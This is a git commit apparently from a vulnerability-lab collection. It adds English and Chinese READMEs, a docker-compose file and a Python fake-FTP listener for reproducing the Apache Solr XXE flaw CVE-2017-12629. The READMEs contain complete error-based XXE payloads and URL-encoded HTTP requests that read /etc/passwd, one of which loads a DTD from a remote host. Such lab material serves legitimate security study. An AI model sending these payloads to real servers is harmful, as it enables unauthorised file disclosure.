first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/solr/CVE-2017-12629-XXE/1.png
+++ b/solr/CVE-2017-12629-XXE/1.png
--- a/solr/CVE-2017-12629-XXE/2.png
+++ b/solr/CVE-2017-12629-XXE/2.png
--- a/solr/CVE-2017-12629-XXE/3.png
+++ b/solr/CVE-2017-12629-XXE/3.png
--- a/solr/CVE-2017-12629-XXE/README.md
+++ b/solr/CVE-2017-12629-XXE/README.md
@@ -0,0 +1,159 @@
+# Apache Solr XML External Entity Injection (CVE-2017-12629)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. Before version 7.1.0, two vulnerabilities were discovered: XML External Entity (XXE) and Remote Command Execution (RCE), both numbered as CVE-2017-12629. These two vulnerabilities can be chained together to form an attack chain.
+
+This environment demonstrates the XXE vulnerability. For the RCE vulnerability and exploitation chain, please refer to [CVE-2017-12629-RCE](../CVE-2017-12629-RCE/).
+
+References:
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 7.0.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+Since the response does not include the information we sent in the XML, this is a Blind XXE vulnerability. However, we can use [Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) to read files.
+
+To exploit Error Based XXE, we need to find suitable DTD files. Here are several approaches:
+
+### Using fonts.dtd from fontconfig-config
+
+The openjdk Docker image has fontconfig-config installed, which contains a suitable DTD file: `/usr/share/xml/fontconfig/fonts.dtd`.
+
+Construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
+
+    <!ENTITY % expr 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+![](1.png)
+
+### Using DTD from JAR Files
+
+Since we can't predict what software is installed on the target server in a black-box scenario, using DTD files from internal JAR files is a better approach. For example, we can use LuceneCoreQuery.dtd from the lucene-queryparser.jar that Solr depends on.
+
+Construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
+
+    <!ENTITY % queries 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+Successfully read the `/etc/passwd` file:
+
+![](2.png)
+
+### Using Remote DTD Files
+
+If we cannot find suitable local DTD files on the target server and the server can connect to the internet, we can use remote DTD files.
+
+Deploy a DTD file on an HTTP server:
+
+```xml
+<!ENTITY % test "example">
+<!ELEMENT pattern (%test;)>
+```
+
+Then construct the XXE payload:
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">
+
+    <!ENTITY % test 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+Send the request with the encoded payload:
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22https%3A%2F%2Fgist%2Egithubusercontent%2Ecom%2Fphith0n%2F188f03ac0f3c5d899895268f05fd0a51%2Fraw%2F7b481b122622d77c49c619fa047a52051f9652d8%2Finclude%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20test%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+Successfully read the `/etc/passwd` file:
+
+![](3.png)
--- a/solr/CVE-2017-12629-XXE/README.zh-cn.md
+++ b/solr/CVE-2017-12629-XXE/README.zh-cn.md
@@ -0,0 +1,159 @@
+# Apache Solr XML 外部实体注入漏洞（CVE-2017-12629）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。在 7.1.0 版本之前，发现了两个漏洞：XML 外部实体注入（XXE）和远程命令执行（RCE），这两个漏洞的编号均为 CVE-2017-12629。这两个漏洞可以连接成利用链。
+
+本环境演示 XXE 漏洞。关于 RCE 漏洞和利用链的演示，请参考 [CVE-2017-12629-RCE](../CVE-2017-12629-RCE/)。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/43009/>
+- <https://paper.seebug.org/425/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+由于返回包中不包含我们传入的 XML 中的信息，所以这是一个 Blind XXE 漏洞。但我们可以利用 [Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) 来读取文件。
+
+要利用 Error Based XXE，需要找到合适的 DTD 文件。这里提供几个思路：
+
+### 使用 fontconfig-config 中的 fonts.dtd
+
+openjdk 的 Docker 镜像安装了 fontconfig-config，其中包含一个符合要求的 DTD 文件：`/usr/share/xml/fontconfig/fonts.dtd`。
+
+构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
+
+    <!ENTITY % expr 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](1.png)
+
+### 使用 JAR 包中的 DTD 文件
+
+由于是黑盒测试，我们无法预测目标服务器安装了哪些软件，使用软件内部的 DTD 文件是一个更好的方法。比如可以使用 Solr 依赖的 lucene-queryparser.jar 中的 LuceneCoreQuery.dtd。
+
+构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
+
+    <!ENTITY % queries 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](2.png)
+
+### 使用远程 DTD 文件
+
+如果我们在目标服务器上找不到合适的本地 DTD 文件，且服务器可以连接外网，也可以使用远程 DTD 文件。
+
+在 HTTP 服务器上部署一个 DTD 文件：
+
+```xml
+<!ENTITY % test "example">
+<!ELEMENT pattern (%test;)>
+```
+
+然后构造 XXE Payload：
+
+```xml
+<?xml version="1.0" ?>
+<!DOCTYPE message [
+    <!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">
+
+    <!ENTITY % test 'aaa)>
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+        <!ELEMENT aa (bb'>
+
+    %local_dtd;
+]>
+<message>any text</message>
+```
+
+将编码后的 payload 放在如下请求中发送：
+
+```
+GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22https%3A%2F%2Fgist%2Egithubusercontent%2Ecom%2Fphith0n%2F188f03ac0f3c5d899895268f05fd0a51%2Fraw%2F7b481b122622d77c49c619fa047a52051f9652d8%2Finclude%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20test%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
+Host: localhost.lan:8983
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+可见，成功读取到了 `/etc/passwd` 文件：
+
+![](3.png)
--- a/solr/CVE-2017-12629-XXE/docker-compose.yml
+++ b/solr/CVE-2017-12629-XXE/docker-compose.yml
@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:7.0.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"
--- a/solr/CVE-2017-12629-XXE/ftp.py
+++ b/solr/CVE-2017-12629-XXE/ftp.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python3
+import socketserver
+
+
+class MyTCPHandler(socketserver.BaseRequestHandler):
+
+    def handle(self):
+        # self.request is the TCP socket connected to the client
+        self.request.send(b'220 xxe-ftp-server\r\n')
+        self.communicating = True
+        while self.communicating:
+            cmd = self.request.recv(1024)
+            if len(cmd) == 0:
+                break
+
+            cmd = cmd.decode().rstrip()
+            print("> " + cmd)
+            if cmd.split(' ', 1)[0] == 'USER':
+                self.request.send(b'331 password please - version check\r\n')
+            else:
+                self.request.send(b'230 more data please!\r\n')
+        
+
+if __name__ == "__main__":
+    HOST, PORT = "0.0.0.0", 2121
+
+    server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
+    server.serve_forever()